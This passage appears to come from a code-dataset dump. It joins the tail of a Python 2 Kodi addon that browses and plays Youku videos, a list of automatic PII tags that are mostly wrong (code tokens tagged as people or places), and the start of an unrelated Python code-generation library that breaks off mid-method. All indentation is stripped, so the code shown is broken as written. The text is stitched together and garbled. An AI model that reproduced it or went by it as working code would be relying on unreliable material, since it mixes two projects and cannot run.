', re.DOTALL).search(link)
if match:
listpage = match.group(1)
else:
listpage = ''
match = re.compile('
', re.DOTALL).findall(link)
totalItems = len(match) + 1 + len(plist)
currpage = int(page)
genrelist = getList2(listpage, genre)
if genre == '0':
genrestr = '全部类型'
else:
genrestr = searchDict(genrelist,genre)
li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST2,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST2,order) + '[/COLOR]】(按此选择)')
u = sys.argv[0]+""?mode=12&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
for i in range(0,len(match)):
match1 = re.compile('/id_(.+?).html""').search(match[i])
p_id = match1.group(1)
match1 = re.compile('
(.+?) ').search(match[i])
p_name = match1.group(1)
p_name1 = p_name
li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+""?mode=10&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb)
#li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)
for num in plist:
li = xbmcgui.ListItem(""... 第"" + num + ""页"")
u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+str(num)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def selResolution(streamtypes):
ratelist = []
for i in range(0,len(streamtypes)):
if streamtypes[i] in ('flv', 'flvhd'): ratelist.append([4, '标清', i, 'flv']) # [清晰度设置值, 清晰度, streamtypes索引]
if streamtypes[i] in ('mp4', 'mp4hd'): ratelist.append([3, '高清', i, 'mp4'])
if streamtypes[i] in ('hd2', 'hd2v2', 'mp4hd2', 'mp4hd2v2'): ratelist.append([2, '超清', i, 'hd2'])
if streamtypes[i] in ('hd3', 'hd3v2', 'mp4hd3', 'mp4hd3v2'): ratelist.append([1, '1080P', i, 'hd3'])
ratelist.sort()
if len(ratelist) > 1:
resolution = int(__addon__.getSetting('resolution'))
if resolution == 0: # 每次询问视频清晰度
list = [x[1] for x in ratelist]
sel = xbmcgui.Dialog().select('清晰度(低网速请选择低清晰度)', list)
if sel == -1:
return None, None, None, None
else:
sel = 0
while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1
else:
sel = 0
return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3]
def youku_ups(id):
res = urllib2.urlopen('https://log.mmstat.com/eg.js')
cna = res.headers['etag'][1:-1]
query = urllib.urlencode(dict(
vid = id,
ccode = '0516',
client_ip = '127.0.0.1',
utid = cna,
client_ts = time.time() / 1000,
ckey = 'PI:KEY'
))
url = 'https://ups.youku.com/ups/get.json?%s' % (query)
link = GetHttpData(url, referer='http://v.youku.com/')
json_response = simplejson.loads(link)
api_data = json_response['data']
data_error = api_data.get('error')
if data_error:
api_error_code = data_error.get('code')
api_error_msg = data_error.get('note').encode('utf-8')
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'地址解析错误(%d):\n%s' % (api_error_code,api_error_msg))
return {}
else:
return api_data
def change_cdn(url):
# if the cnd_url starts with an ip addr, it should be youku's old CDN
# which rejects http requests randomly with status code > 400
# change it to the dispatcher of aliCDN can do better
# at least a little more recoverable from HTTP 403
dispatcher_url = 'vali.cp31.ott.cibntv.net'
if dispatcher_url in url:
return url
elif 'k.youku.com' in url:
return url
else:
url_seg_list = list(urlparse.urlsplit(url))
url_seg_list[1] = dispatcher_url
return urlparse.urlunsplit(url_seg_list)
def PlayVideo(name,id,thumb):
movdat = youku_ups(id)
if not movdat:
return
vid = id
lang_select = int(__addon__.getSetting('lang_select')) # 默认|每次选择|自动首选
if lang_select != 0 and movdat.has_key('dvd') and 'audiolang' in movdat['dvd']:
langlist = movdat['dvd']['audiolang']
if lang_select == 1:
list = [x['lang'] for x in langlist]
sel = xbmcgui.Dialog().select('选择语言', list)
if sel ==-1:
return
vid = langlist[sel]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[sel]['lang'].encode('utf-8'))
else:
lang_prefer = __addon__.getSetting('lang_prefer') # 国语|粤语
for i in range(0,len(langlist)):
if langlist[i]['lang'].encode('utf-8') == lang_prefer:
vid = langlist[i]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[i]['lang'].encode('utf-8'))
break
if vid != id:
movdat = youku_ups(vid)
if not movdat:
return
streamtypes = [stream['stream_type'].encode('utf-8') for stream in movdat['stream']]
typeid, typename, streamno, resolution = selResolution(streamtypes)
if typeid:
'''
oip = movdat['security']['ip']
ep = movdat['security']['encrypt_string']
sid, token = youkuDecoder().get_sid(ep)
play_method = int(__addon__.getSetting('play_method'))
if play_method != 0: # m3u8方式
query = urllib.urlencode(dict(
vid=vid, ts=int(time.time()), keyframe=1, type=resolution,
ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid,
))
cookie = ['%s=%s' % (x.name, x.value) for x in cj][0]
movurl = 'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s' % (query, cookie)
else: # 默认播放方式
if typeid in ('mp4', 'mp4hd'):
type = 'mp4'
else:
type = 'flv'
urls = []
segs = movdat['stream'][streamno]['segs']
total = len(segs)
for no in range(0, total):
k = segs[no]['key']
if k == -1:
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'会员节目,无法播放')
return
fileid = segs[no]['fileid']
ep = youkuDecoder().generate_ep(no, fileid, sid, token)
query = urllib.urlencode(dict(
ctype = 12,
ev = 1,
K = k,
ep = urllib.unquote(ep),
oip = oip,
token = token,
yxon = 1
))
url = 'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format(
sid = sid,
container = type,
fileid = fileid,
query = query
)
link = GetHttpData(url)
json_response = simplejson.loads(link)
urls.append(json_response[0]['server'].encode('utf-8'))
movurl = 'stack://' + ' , '.join(urls)
'''
movurl = movdat['stream'][streamno]['m3u8_url']
#urls = []
#is_preview = False
#for seg in movdat['stream'][streamno]['segs']:
# if seg.get('cdn_url'):
# urls.append(change_cdn(seg['cdn_url'].encode('utf-8')))
# else:
# is_preview = True
#if not is_preview:
# movurl = 'stack://' + ' , '.join(urls)
name = '%s[%s]' % (name, typename)
listitem=xbmcgui.ListItem(name,thumbnailImage=thumb)
listitem.setInfo(type=""Video"",infoLabels={""Title"":name})
xbmc.Player().play(movurl, listitem)
def performChanges(name,id,listpage,genre,area,year,order,days):
genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)
change = False
if id == 'c_95':
str1 = '风格'
str3 = '发行'
elif id == 'c_84' or id == 'c_87':
str1 = '类型'
str3 = '出品'
else:
str1 = '类型'
str3 = '时间'
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
list = [x[1] for x in genrelist]
sel = dialog.select(str1, list)
if sel != -1:
genre = genrelist[sel][0]
change = True
if len(arealist)>0:
list = [x[1] for x in arealist]
sel = dialog.select('地区', list)
if sel != -1:
area = arealist[sel][0]
change = True
if len(yearlist)>0:
list = [x[1] for x in yearlist]
sel = dialog.select(str3, list)
if sel != -1:
year = yearlist[sel][0]
change = True
list = [x[1] for x in DAYS_LIST1]
sel = dialog.select('范围', list)
if sel != -1:
days = DAYS_LIST1[sel][0]
change = True
list = [x[1] for x in ORDER_LIST1]
sel = dialog.select('排序', list)
if sel != -1:
order = ORDER_LIST1[sel][0]
change = True
if change:
progList(name,id,'1',genre,area,year,order,days)
def performChanges2(name,id,listpage,genre,order,days):
genrelist = getList2(listpage, genre)
change = False
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
list = [x[1] for x in genrelist]
sel = dialog.select('类型', list)
if sel != -1:
genre = genrelist[sel][0]
change = True
list = [x[1] for x in DAYS_LIST2]
sel = dialog.select('范围', list)
if sel != -1:
days = DAYS_LIST2[sel][0]
change = True
list = [x[1] for x in ORDER_LIST2]
sel = dialog.select('排序', list)
if sel != -1:
order = ORDER_LIST2[sel][0]
change = True
if change:
progList2(name,id,'1',genre,order,days)
def get_params():
param = []
paramstring = sys.argv[2]
if len(paramstring) >= 2:
params = sys.argv[2]
cleanedparams = params.replace('?', '')
if (params[len(params) - 1] == '/'):
params = params[0:len(params) - 2]
pairsofparams = cleanedparams.split('&')
param = {}
for i in range(len(pairsofparams)):
splitparams = {}
splitparams = pairsofparams[i].split('=')
if (len(splitparams)) == 2:
param[splitparams[0]] = splitparams[1]
return param
params = get_params()
mode = None
name = ''
id = ''
genre = ''
area = ''
year = ''
order = ''
page = '1'
url = None
thumb = None
try:
thumb = urllib.unquote_plus(params[""thumb""])
except:
pass
try:
url = urllib.unquote_plus(params[""url""])
except:
pass
try:
page = urllib.unquote_plus(params[""page""])
except:
pass
try:
order = urllib.unquote_plus(params[""order""])
except:
pass
try:
days = urllib.unquote_plus(params[""days""])
except:
pass
try:
year = urllib.unquote_plus(params[""year""])
except:
pass
try:
area = urllib.unquote_plus(params[""area""])
except:
pass
try:
genre = urllib.unquote_plus(params[""genre""])
except:
pass
try:
id = urllib.unquote_plus(params[""id""])
except:
pass
try:
name = urllib.unquote_plus(params[""name""])
except:
pass
try:
mode = int(params[""mode""])
except:
pass
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
if mode == None:
rootList()
elif mode == 1:
progList(name,id,page,genre,area,year,order,days)
elif mode == 2:
getMovie(name,id,thumb)
elif mode == 3:
seriesList(name,id,thumb)
elif mode == 4:
performChanges(name,id,page,genre,area,year,order,days)
elif mode == 10:
PlayVideo(name,id,thumb)
elif mode == 11:
progList2(name,id,page,genre,order,days)
elif mode == 12:
performChanges2(name,id,page,genre,order,days)
",27353,"[['URL', ""http://list.youku.com/'""], ['URL', ""http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html'""], ['URL', ""http://www.youku.com/show_page/id_'""], ['URL', 'http://v.youku.com/v_show/id_%s.html""'], ['URL', 'http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s""'], ['URL', ""http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://ups.youku.com/ups/get.json?%s'""], ['URL', ""http://v.youku.com/'""], ['URL', ""http://pl.youku.com/playlist/m3u8?%s|Cookie=%s'""], ['URL', ""http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format""], ['LOCATION', 'xbmcgui'], ['LOCATION', 'xbmcaddon'], ['PERSON', 'urllib2'], ['LOCATION', 'os'], ['LOCATION', 'gzip'], ['PERSON', 'Mozilla/5.0'], ['DATE_TIME', ""'5','最受欢迎'""], ['PERSON', 'DAYS_LIST2'], ['DATE_TIME', '65536'], ['NRP', 'sid'], ['PERSON', 'token = e_code.split'], ['NRP', 'sid'], ['PERSON', 'LOGDEBUG'], ['URL', 'code.co'], ['URL', 'urllib2.Re'], ['URL', 'req.ad'], ['URL', 'response.re'], ['PERSON', 'c_95'], ['DATE_TIME', 'year'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['PERSON', 'c_95'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', ""yearstr + '""], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'
.
""""""
.. moduleauthor:: Douglas RAILLARD dummy@email.com
This module mostly provides base classes intended to be subclassed for building
langage specific source code generation libraries.
They implement functionnalities related to operators overloading that can be used in any langage.
Every class representing source code constructs are known as node.
The following helpers functions are provided:
* :func:`listify`: create a list from an iterable or a single element.
* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.).
* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string.
The following classes are provided:
* :class:`Indentation`: manage the indentation level in the code generator.
* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as a non iterable by :func:`listify`.
* :class:`NodeMeta`: metaclass of all class representing some source code constructs.
* :class:`NodeABC`: abstract base class of all class representing some source code constructs.
* :class:`NodeBase`: base class of almost all class representing some source code constructs.
* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition.
* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC.
* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name.
* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable).
* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required.
* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading.
* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenate them when printed.
* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance).
* :class:`TokenListBase`: base class for a token list.
* :class:`IndentedTokenListBase`: base class for a token list which indents it content when printed.
* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`.
* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator.
""""""
import collections
import numbers
import abc
import inspect
import copy
import functools
import os
def listify(iterable_or_single_elem):
""""""Create a list out of:
* an iterable object: the result will be like ``list(iterable_or_single_elem)``
* a object which cannot be iterated over: return a list with only one item (just the object)
* an object which is iterable, but also a subclass of :class:`NonIterable`:
return a list with just the object, as if it was not iterable.
""""""
if iterable_or_single_elem is None:
return []
# We exclude iterables such as strings or NonIterable (StmtContainer for example)
# because we want to keep them as one object and not split them
if isinstance(iterable_or_single_elem, collections.Iterable) \
and not isinstance(iterable_or_single_elem, (str, NonIterable)):
return list(iterable_or_single_elem)
else:
return [iterable_or_single_elem]
def format_string(string, style, separator=""_""):
"""""" Format a string according to a convention.
It is can be used to write identfiers name in a unified format before applying a naming convention.
:param string: the string to be modified. It must be in a format where the word sperator is always the same.
:param style: the convention. It can be one of:
* UpperCamelCase
* lowerCamelCase
* lower_underscore_case
* UPPER_UNDERSCORE_CASE
:param separator: the word separator used to split the words appart before applying the convention.
It defaults to '_'.
""""""
if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)):
token_list = string
else:
token_list = str(string).split(separator)
# If there is only one token in the list and in case it is an empty
# string, we dont want to replace it with a _
if len(token_list) != 1:
for i, token in enumerate(token_list):
if not token:
token_list[i] = separator
if style == ""UpperCamelCase"":
return """".join(token.capitalize() for token in token_list)
if style == ""lowerCamelCase"":
first_word = token_list[0].lower()
remain_list = token_list[1:]
return first_word+"""".join(token.capitalize() for token in remain_list)
if style == ""lower_underscore_case"":
return ""_"".join(token.lower() for token in token_list)
if style == ""UPPER_UNDERSCORE_CASE"":
return ""_"".join(token.upper() for token in token_list)
def strip_starting_blank_lines(snippet):
""""""Strip blank lines at the beginning of a multiline string.""""""
last_new_line_pos = 0
for position, char in enumerate(snippet):
if char=='\n':
last_new_line_pos = position
elif char!='\t' and char!=' ' and char!='\v':
break
# Only keep one new line at the beginning, to avoid multiple blank lines
return snippet[last_new_line_pos:]
class Indentation:
""""""This class manages the indentation in the source code output.
Instances can be printed to give the string to put at the beginning of a new indented line.
>>> idt = Indentation()
>>> idt.indent()
>>> print('*'+str(idt)+'indented Hello World')
* indented Hello World
""""""
# Default indentation style (4 spaces)
indentation_string = ' '
@classmethod
def ensure_idt(cls, idt):
""""""Create a new indentation instance if *idt* is None,
or return *idt* if it is already an :class:`Indentation` instance.
""""""
if idt is None:
idt = cls()
elif isinstance(idt, numbers.Integral):
idt = cls(idt)
elif isinstance(idt, str):
idt = cls(indentator=idt)
return idt
def __init__(self, level=0, indentator=None):
""""""
:param level: the initial indentation level
:type level: int
:param indentator: the string used to display indentation.
It defaults to the class attribute *indentation_string* which is four spaces.
""""""
self.indentation_level = level
# If an indentation is string is given, override the classwide default with
# an instance-local string
if indentator is not None:
self.indentation_string = indentator
def indent(self, level=1):
""""""Increase the indentation level by *level* levels.""""""
self.indentation_level += level
def dedent(self, level=1):
""""""Decrease the indentation level by *level* levels.""""""
self.indentation_level -= level
def __str__(self):
""""""Return the string to be used at the beginning of a line to display the indentation.""""""
return self.indentation_string * self.indentation_level
class NonIterable:
"""""" Inheriting from this class will prevent a class to be considered as
:class:`collections.Iterable` by :func:`listify`.
""""""
pass
class NodeMeta(abc.ABCMeta):
""""""Meta class used for every node, i.e. every class representing source code constructs.
Currently, it only does a bit of black magic on :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods:
it creates a wrapper around them that calls *inline_str_filter* if it exists on their return string, to
let the user apply some naming convention at the latest stage.
""""""
def __new__(meta, name, bases, dct):
# Add automatic 'inheritance' for __format_string class attribute
attr_name = '_'+name+'__format_string'
if bases and not attr_name in dct:
try:
dct[attr_name] = bases[0].__dict__['_'+bases[0].__name__+'__format_string']
except KeyError:
pass
# Wrap inline_str function to allow automatic filtering on its output
def make_wrapper(wrapped_fun):
@functools.wraps(wrapped_fun)
def wrapper_fun(self, *args, **kwargs):
result = wrapped_fun(self, *args, **kwargs)
try:
filter_fun = self.inline_str_filter
except AttributeError:
# Just return the string as is, no filter hook is installed
return result
else:
# Call the filter on the resulting string
return filter_fun(result)
return wrapper_fun
for stringify_fun_name in ['inline_str', 'self_inline_str']:
if stringify_fun_name in dct:
wrapped_fun = dct[stringify_fun_name]
dct[stringify_fun_name] = make_wrapper(wrapped_fun)
return super().__new__(meta, name, bases, dct)
class NodeABC(metaclass=NodeMeta):
""""""This class is an Abstract Base Class describing the most basic API evey node should conform to.""""""
__format_string = ''
@abc.abstractmethod
def inline_str(self, idt=None):
""""""This function is called to print the content of the node in an inline context.
This can be for example when the node is printed inside an expression.
This function should not try to print a preceding new line or indentation string.
""""""
pass
@abc.abstractmethod
def freestanding_str(self, idt=None):
""""""This function is called to print the content of the node in a freestanding context.
This can be for example when the node is printed in directly in the source file.
This function should print the preceding new line and indentation if the source code constructs
requires it.
""""""
pass
@abc.abstractmethod
def adopt_node(self, child):
pass
class NodeAttrProxy(NodeABC):
""""""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given
attribute of a given instance.
It creates stubs that allows transparent composition for the most limited subset of the APIs
provided by this library to avoid getting into crazy things.
This class should really be used when this enable to factor lots of code. A design based on
hooks implemented in subclasses called by a base class is preferable in most case where you
would be tempted to use this proxy.
""""""
def __init__(self, obj, attr_name):
self.obj = obj
self.attr_name = attr_name
def inline_str(self, idt=None):
return getattr(self.obj, self.attr_name).inline_str(idt)
def freestanding_str(self, idt=None):
return getattr(self.obj, self.attr_name).freestanding_str(idt)
def adopt_node(self, child):
return getattr(self.obj, self.attr_name).adopt_node(child)
class EnsureNode:
""""""This class is a descriptor that makes sure that the attribute that uses it holds a reference
to an instance of one of the classes given in *node_classinfo*.
When set, this descriptor check if the given object is indeed an instance of *node_classinfo* classes.
If not, it calls *node_factory* to build an object and store its return value. Therefore,
the content of the attribute using this descriptor is always some instance of the classes
contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions
on the type of data hold by the attribute.
.. note:: The *node_classinfo* always contains the class :class:`NodeABC`.
""""""
def __init__(self, storage_attr_name, node_factory, node_classinfo=()):
""""""
:param storage_attr_name: the underlying attribute used to store the object.
:param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute.
:param node_classinfo: this is a tuple that containes classes.
The value stored in the attribute is checked against this tuple using :func:`isinstance` to
determine if the factory should be used. This always contains at least :class:`NodeABC`
""""""
self.storage_attr_name = storage_attr_name
self.node_factory = node_factory
node_classinfo = listify(node_classinfo)+[NodeABC]
if inspect.isclass(self.node_factory):
node_classinfo.append(self.node_factory)
node_classinfo = tuple(node_classinfo)
self.node_classinfo = node_classinfo
def __get__(self, instance, owner):
if instance is not None:
return instance.__dict__[self.storage_attr_name]
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
instance.__dict__[self.storage_attr_name] = value
class NodeBase(NodeABC):
""""""This class is the base classes of most nodes.
It provides some default implementations for methods of :class:`NodeABC`.
""""""
@classmethod
def ensure_node(cls, obj, factory=None):
""""""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`
, and if not, tries to build a node from it using the class this class method is called from or *factory*.
.. note:: You should better use the :class:`EnsureNode` descriptor when possible, instead of making a use of
this class method.
.. warning:: Not every class supports to be called whith only one parameter, so a call to this
class method is note is not guaranteed to succeed.
:param obj: the object to build a node from.
:param factory: an optional factory used to build the node from *obj*. If not provided, the class this
method is called from is called whith *obj* as first and only parameter.
""""""
if isinstance(obj, (cls, NodeABC)):
return obj
else:
if factory is not None:
return factory(obj)
else:
return cls(obj)
def __init__(self, comment=None, side_comment=None, parent=None):
"""""" All of the paramaters should be used as keyword arguments, because they are forwarded from
the children classes and the order at the arrival is not guaranteed.
:param comment: a comment node that will be printed next to the current node when the source code of
the node is generated. Usually, it is a block comment printed before the node
in languages that supports them. This comment is printed by the containers such as
:class:`NodeContainerBase`, so it does not require any support from the class.
:param side_comment: a comment that will be printed just by the current node when the source code of
the node is generated. Usually, it is a one line comment, printed right to the
node. Be aware that this parameter is used by the class in whatever way it wants to,
and there is no guarantee it will be printed at all.
""""""
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.comment = comment
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.side_comment = side_comment
# We dont use try: ... except: to avoid catching exceptions
# occuring inside adopt_node call
if parent is not None:
if hasattr(parent, 'adopt_node'):
parent.adopt_node(self)
else:
raise NotImplementedError(""The given parent does not support child adoption"")
def freestanding_str(self, idt=None):
""""""See :class:`NodeABC` for the role of this function.
This implementation just calls *inline_str* and prepends a new line and indentation string.
""""""
idt = Indentation.ensure_idt(idt)
snippet = self.inline_str(idt)
# Do not output anything if the string is empty
if snippet:
return '\n'+str(idt)+snippet
else:
return ''
def __str__(self, idt=None):
""""""This implementation tries to print the node by probing the object for some methods:
1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node
2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node
3. *freestanding_str()*: see :class:`NodeABC`
""""""
# We dont use try: ... except: to avoid catching exceptions
# occuring inside freestanding_str call
# Try to display a declaration
if hasattr(self, 'decl'):
self_decl = self.decl()
if isinstance(self_decl, NodeABC):
return self_decl.freestanding_str(idt)
# Or a definition
elif hasattr(self, 'defi'):
self_defi = self.defi()
if isinstance(self_defi, NodeABC):
return self_defi.freestanding_str(idt)
else:
return self.freestanding_str(idt)
def adopt_node(self, child):
self.append(child)
class DelegatedAttribute:
""""""This class is a descriptor that allows an object to use the value of that attribute of another instance.
For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment
attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the
:class:`NodeViewBase` instance. When that attribute is set, it uses its own object instead of refering to its parent
one.
""""""
def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):
""""""
:param attr_name: the name of the attribute to manage.
:param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also
holding an *attr_name* attribute.
:param descriptor: a descriptor class, in case the attribute should be managed through a descriptor.
This allows basic descriptor chaining.
:param default_value_list: a list of default values that does not trigger the switch to the local attribute.
For example, if a class set by default a *comment* attribute to None, the attribute
look up should still be made in the other instance. That way, it allows some placeholder
value to be set, without altering the intended behavior.
""""""
self.attr_name = attr_name
self.delegated_to_attr_name = delegated_to_attr_name
self.descriptor = descriptor
self.default_value_list = default_value_list
def __get__(self, instance, owner):
if instance is not None:
# If the attribute has been set on the instance, just get it
if instance.__dict__.get('__'+self.attr_name+'_is_set', False):
if self.descriptor is not None:
return self.descriptor.__get__(instance, owner)
else:
return instance.__dict__[self.attr_name]
# Else it means that the attribute has not been set,
# so we delegate to the parent
else:
parent = getattr(instance, self.delegated_to_attr_name)
return getattr(parent, self.attr_name)
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if self.descriptor is not None:
self.descriptor.__set__(instance, value)
else:
instance.__dict__[self.attr_name] = value
# If the value is one of the default_value_list, do not consider that the attribute was
# set. This allows some code in base classes to set the attribute to None
# by default, and still get the parent's attribute when it is the case
if value not in self.default_value_list:
instance.__dict__['__'+self.attr_name+'_is_set'] = True
class NodeViewBase(NodeBase):
""""""This is the base class of the node that are view of other node.
For example, a variable declaration is a view of the variable, as it only displays
informations already contained in the variable object.
View nodes should store the reference of their parent in a *parent* attribute.
""""""
def __init__(self, parent, *args, **kwargs):
self.parent = parent
super().__init__(*args, **kwargs)
def __eq__(self, other):
""""""implementation of the equality test between two views:
it tests to see if they have the same parent and if the two view
are of the exact same type.
""""""
return type(self) is type(other) and self.parent is other.parent
class PhantomNode(NodeBase):
""""""This class is a node that will be printed as an empty string.
This is intended to be used as a placeholder when a :class:`NodeABC` instance is required.
""""""
# PhantomNode must not call Node.__init__ because it causes infinite
# recursion when built from Node.__init__
def __init__(self, *args, **kwargs):
self.parent = self
self.comment = self
self.side_comment = self
def inline_str(self, idt=None):
return ''
freestanding_str = inline_str
# Instance used everywhere, instead of creating billions of identical PhantomNode
PHANTOM_NODE = PhantomNode()
class NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):
""""""This is the base class of all the nodes that contains a list of other nodes.
It implements all the logic for operators overloading, and printing the nodes that it takes care of.
It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves
like a list. The only exception is when given to :func:`listify`, it remains as a single object, because
it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later,
and the result should be taken into account by the consumer that used :func:`listify` on it. If it was not the case,
the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` is called.
The other important aspect of this class is that it can guarantee the type of the contained nodes, even when
overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments.
""""""
default_node_classinfo = (NodeABC,)
def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):
""""""
:param node_list: the list of nodes that the container contains
:param node_classinfo: a tuple of classes used to check the nodes that enters the container.
If a node is not an instance of one of the *node_classinfo* classes, it is
passed to *node_factory*. All of the classes in *node_classinfo* must be
subclasses of :class:`NodeABC`.
:param node_factory: a factory used when an object which is not an instance of one of the classes of
*node_classinfo* tries to enter the container. The return value of this factory
is then allowed inside.
""""""
node_classinfo_tuple = tuple(listify(node_classinfo))
for classinfo in node_classinfo_tuple:
if not issubclass(classinfo, NodeABC):
raise ValueError('node_classinfo must be a subclass of NodeABC')
node_list = listify(node_list)
if node_classinfo is None:
self.node_classinfo = self.default_node_classinfo
else:
self.node_classinfo = node_classinfo_tuple
if node_factory is None:
# If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo
# which is only composed of NodeABC, and therefore cannot be used as a factory
if node_classinfo is None:
raise ValueError(
'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo'
)
# The first element in the tuple is taken as the factory
node_factory = self.node_classinfo[0]
# A wrapper to make sure that the output of the node_factory is
# indeed a NodeABC
def make_node_factory_wrapper(factory):
def wrapper(node):
result = factory(node)
if not isinstance(result, NodeABC):
raise ValueError(""The node factory did not give a NodeABC"")
else:
return result
return wrapper
self.node_factory = make_node_factory_wrapper(node_factory)
self.node_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in node_list
]
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
""""""Print all the contained nodes using their *freestanding_str* method,
because a container is a freestanding context.
It also strips the blank lines at the beginning.
""""""
snippet = """"
for node in self.node_list:
if hasattr(node, 'comment'):
snippet += node.comment.freestanding_str(idt)
snippet += node.freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def freestanding_str(self, idt=None):
""""""Calls super().freestanding_str, and strip the blank lines
at the beginning.
""""""
snippet = super().freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def __copy__(self):
cls = type(self)
new_obj = cls.__new__(cls)
new_obj.__dict__.update(self.__dict__)
new_obj.node_list = copy.copy(self.node_list)
new_obj.node_classinfo = copy.copy(self.node_classinfo)
new_obj.node_factory = copy.copy(self.node_factory)
return new_obj
def clear(self):
# We preserve the object's itself, we do not build a new one
self[:] = []
def insert(self, index, value):
elem_list = listify(value)
